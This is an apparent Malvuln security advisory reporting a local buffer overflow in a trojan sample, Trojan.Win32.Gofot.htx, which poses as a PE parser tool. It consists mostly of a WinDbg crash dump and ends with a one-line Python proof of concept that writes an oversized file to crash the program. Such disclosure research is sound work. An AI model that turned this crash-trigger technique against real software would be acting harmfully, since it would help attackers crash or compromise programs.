Trojan.Win32.Gofot.htx malware suffers from a buffer overflow vulnerability.
f0fd12c55a50d4ef03b089c656756cc3
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ae062bfe4abd59ac1b9be693fbc45f60.txt
Contact: [email protected]
Media: twitter.com/malvuln
Threat: Trojan.Win32.Gofot.htx
Vulnerability: Local File Buffer Overflow
Description: HackerJLY PE Parser tool V1.0.1.8 doesnt properly check the files it loads which triggers a local buffer overflow. Analyzing the crash we can see an overwrite of the CX (16-bit) part of the ECX register with our 41414141 exploit pattern.
Type: PE32
MD5: ae062bfe4abd59ac1b9be693fbc45f60
Vuln ID: MVID-2021-0110
Dropped files:
ASLR: True
DEP: True
Safe SEH: True
Disclosure: 02/25/2021
Memory Dump:
0:000> dd cx
00004141 ???????? ???????? ???????? ????????
(1f60.100): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=45d84141 edx=0057e577 esi=00000003 edi=00000003
eip=7710ed3c esp=0057d9c8 ebp=0057db58 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400 ret 14h
0:000> .ecxr
eax=04970001 ebx=00000000 ecx=45d84141 edx=0057e577 esi=0057e3a0 edi=0057e570
eip=00dca142 esp=0057e34c ebp=0057e34c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
*** WARNING: Unable to verify checksum for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
*** ERROR: Module load completed but symbols could not be loaded for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142:
00dca142 813950450000 cmp dword ptr [ecx],4550h ds:002b:45d84141=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for SkinH.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SkinH.dll -
FAULTING_IP:
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
00dca142 813950450000 cmp dword ptr [ecx],4550h
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00dca142 (Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x0000a142)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 45d84141
Attempt to read from address 45d84141
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
OVERLAPPED_MODULE: Address regions for 'd3d10warp' and 'resourcepolicyclient.dll' overlap
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 45d84141
READ_ADDRESS: 45d84141
FOLLOWUP_IP:
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
00dca142 813950450000 cmp dword ptr [ecx],4550h
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000100
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
LAST_CONTROL_TRANSFER: from 00dcab0f to 00dca142
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0057e34c 00dcab0f 0057e570 097c119a 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142
0057e37c 00dd0af8 046acc58 0057e577 097c1746 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xab0f
0057e5a0 00dd1d78 046acc58 097c1756 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10af8
0057e928 00df676d 00f2fe28 0057f7f0 0057e968 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x11d78
0057e938 00df697c 0057f7f0 000003e9 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3676d
0057e968 00ecb1a4 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3697c
0057e98c 00df3e09 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10b1a4
0057e9dc 00df96fe 00000000 0080072c 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x33e09
0057e9f0 00df4771 000003e9 0080072c 097c184e Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396fe
0057eaa8 00defe3e 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x34771
0057eac8 00df32bb 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe3e
0057eb3c 00df334a 0057f7f0 00d802be 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb
0057eb5c 76eee0bb 00d802be 00000111 000003e9 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a
0057eb88 76ef8849 00df3314 00d802be 00000111 user32!_InternalCallWinProc+0x2b
0057ebac 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20
0057ec7c 76ef833a 00df3314 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0057ecc0 76edf38b 00000111 000003e9 0080072c user32!CallWindowProcAorW+0xd4
0057ecd8 1002285c ffff04db 00d802be 00000111 user32!CallWindowProcA+0x1b
0057ed34 76ef8849 1001f2d0 00d802be 00000111 SkinH+0x2285c
0057ed58 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20
0057ee28 76ee8503 1001f2d0 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0057ee90 76ee8aa0 03027740 00000000 00000111 user32!DispatchClientMessage+0x1b3
0057eed8 77110bcd 0057eef4 00000020 0057f184 user32!__fnDWORD+0x50
0057ef10 73ee2a4c 76efa9fd 00d802be 00000111 ntdll!KiUserCallbackDispatcher+0x4d
0057ef14 76efa9fd 00d802be 00000111 000003e9 win32u!NtUserMessageCall+0xc
0057ef80 76edb95b 03027740 00000000 0080072c user32!SendMessageWorker+0x860
0057efa8 73836934 00d802be 00000111 000003e9 user32!SendMessageW+0x5b
0057efc8 738368f9 007286c0 00000202 00000000 comctl32!Button_NotifyParent+0x39
0057efe0 7384c14b 7384b890 0080072c 00000000 comctl32!Button_ReleaseCapture+0x9b
0057f074 76eee0bb 0080072c 00000202 00000000 comctl32!Button_WndProc+0x8bb
0057f0a0 76ef8849 7384b890 0080072c 00000202 user32!_InternalCallWinProc+0x2b
0057f0c4 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f194 76ef833a 7384b890 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f1d8 76edfbab 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4
0057f1f0 73a676f5 7384b890 0080072c 00000202 user32!CallWindowProcW+0x1b
0057f214 00defcc9 7384b890 0080072c 00000202 apphelp!DWM8AND16BitHook_CallWindowProcW+0x35
0057f234 00defe55 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fcc9
0057f250 00df32bb 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe55
0057f2c4 00df334a 0057f924 0080072c 00000202 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb
0057f2e4 76eee0bb 0080072c 00000202 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a
0057f310 76ef8849 00df3314 0080072c 00000202 user32!_InternalCallWinProc+0x2b
0057f334 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f404 76ef833a 00df3314 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f44c 76edf38b 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4
0057f464 10007514 ffff039b 0080072c 00000202 user32!CallWindowProcA+0x1b
0057f4d8 76ef8849 10011fd0 0080072c 00000202 SkinH+0x7514
0057f4fc 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20
0057f5cc 76ee90dc 10011fd0 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be
0057f638 76edb2ee 006f0588 00000000 00000100 user32!DispatchMessageWorker+0x4ac
0057f66c 00e0a996 00d802be 006f0588 097c0426 user32!IsDialogMessageW+0x17e
0057f6c0 00df5c7c 0057f7f0 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x4a996
0057f6d4 00df0cb5 006f0588 0057f6f4 00dee82c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x35c7c
0057f6e0 00dee82c 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x30cb5
0057f6f4 00df96b9 006f0588 00d802be 0057f718 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2e82c
0057f704 00df289a 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396b9
0057f718 00df7765 00d802be 006f0588 006f0558 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3289a
0057f730 00df78bf 006f0588 0057f748 00df77b0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x37765
0057f73c 00df77b0 006f0588 0057f780 00df790c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x378bf
0057f748 00df790c 006f0588 00000000 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x377b0
0057f780 00deeed5 00000004 097c052a 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3790c
0057f7cc 00dcf1f9 097c053e 00f61b48 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2eed5
0057fb44 00e20c1d 00fc7b10 00000000 00353000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xf1f9
0057fb58 00dd59c4 00dc0000 00000000 006e1eb8 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x60c1d
0057fbe8 76198654 00353000 76198630 1507c2ff Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x159c4
0057fbfc 77104a77 00353000 1fe72005 00000000 kernel32!BaseThreadInitThunk+0x24
0057fc44 77104a47 ffffffff 77129ece 00000000 ntdll!__RtlUserThreadStart+0x2f
0057fc54 00000000 00fc7b10 00353000 00000000 ntdll!_RtlUserThreadStart+0x1b
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60
IMAGE_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 59b2a1cb
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142
Exploit/PoC:
python -c "print( 'MZ'+'A'*20000)" > pbarbar.exe
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).